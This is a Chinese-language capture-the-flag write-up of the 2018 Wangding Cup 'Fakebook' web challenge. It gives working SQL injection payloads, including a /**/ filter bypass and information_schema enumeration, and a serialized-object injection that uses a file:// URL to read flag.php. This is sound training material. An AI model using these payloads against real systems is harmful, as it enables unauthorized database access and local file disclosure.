[网鼎杯 2018]Fakebook
题目:
打开环境,得到:
刚一来就直接整了两个最显眼的东西:
一个login
,一个join
接下来就说说我做这道题的思路:
最初我是想随便注册一个join:
点击join,发现报错:
告诉我们blog是不合法的,那它应该是对blog做了过滤(盲猜应该有后台源码泄露,直接就拿扫后台工具扫一下:
发现有个/robots.txt与/user.php.bak,(心里狂喜
接下来直接访问就行了
得到:
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
可以看到确实是对blog做了过滤的,所以直接构造符合正则的blog就好:
我这里用的blog是:
123.hhh
点击join,即可来到这个界面:
emmmmmmm
好像还是没什么线索,不过还可以继续点击我们的username,就试试看:
见鬼,这又是个什么界面?
不过在卡了一会过后,突然看到url上面出现了个no=1
???,心里又是狂喜,(这应该是个注入点了
二话不说,直接开始进行注入:
首先输入了no=1'
,发现了报错信息:
确实是个sql注入点,并且可以拿到网站的绝对路径:/var/www/html/
接下来就是考虑如何进行sql注入了,先试下常规的爆字段吧:
.......
no=1 order by 4
no=1 order by 5
可以看到,字段数为4(居然没有任何过滤?)
接着就查找回显点:
no=2 union select 1,2,3,4
结果就报错了
看来还是进行了过滤的呀,慢慢测试发现是对union select
这个字符串做了过滤,这好办,直接绕过union select
的空格就好了,构造payload:
no=2 union/**/select 1,2,3,4
得到:
可以发现回显点为2,接着就要去爆库了,构造payload:
no=2 union/**/select 1,database(),3,4
得到:
可知库名是fakebook,继续构造payload:
no=2 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'
得到:
表名为users,继续:
no=2 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
得到:
列名为:
no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
一下子出现这么多列,有点不知从何入手,不过可以靠逻辑推理来下手,我们已经知道了no,username,passwd,但还没见过data,所以就先从data下手,构造payload:
no=2 union/**/select 1,data,3,4 from users
得到:
可以看到这是一个序列化后的Userinfo对象(这怎么又成了反序列化的内容了??
emmmmmmmmm
确实有点没有头绪了,这个是序列化data后的内容,难道是要让我们传入反序列化后的data,最终得到flag?
但好像没有可以要反序列化的内容了,所以我总觉得丢了点什么,于是又从头开始缕头绪:
想着会不会是没扫到什么东西,于是又用御剑扫了一下:
果然,有个flag.php文件,访问试试看
好吧,什么都没有
然后又回到这个界面:
查看源码,hjh,原来还有个提示:
右边的iframe
标签的src属性有个data:text/html;base64,
,一看就知道是用了伪协议的
现在就有点头绪了,可能是想通过伪协议来访问flag.php,再输入反序列化的内容,然后在iframe标签里应该可以得到flag,说干就干:
先得到序列化的信息:
<?php
class UserInfo{
public $name='o3Ev';
public $age=1;
public $blog='file:///var/www/html/flag.php';
}
$a=new UserInfo('');
print_r(serialize($a));
;?>
构造payload:
no=2 union/**/select 1,'O:8:"UserInfo":3:{s:4:"name";s:4:"o3Ev";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}',3,4
但发现报错了:
心累(实在做不起走了
然后我就把这道题放了下,第二天又才来继续肝的,于是又点进来了这个界面:
突然发现名字上面的username
,然后想到第一天肝这道题时,查到这个位置回显点是2,也正好是那个表名的顺序,所以有可能select 1,2,3,4的对应位置就是no username passwd data
的对应点,是不是也得试了才知道,构造payload:
no=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"o3Ev";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
得到:
可以看到页面正常了,说明应该是对了,接下来直接去源码查看iframe
即可:
得到:data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tiMjRjMzA0Mi0xMmM3LTQ4NTYtOGZiYS03NzI0OGQyYjIyZmN9IjsNCmV4aXQoMCk7DQo=
直接base64解密就可以拿到flag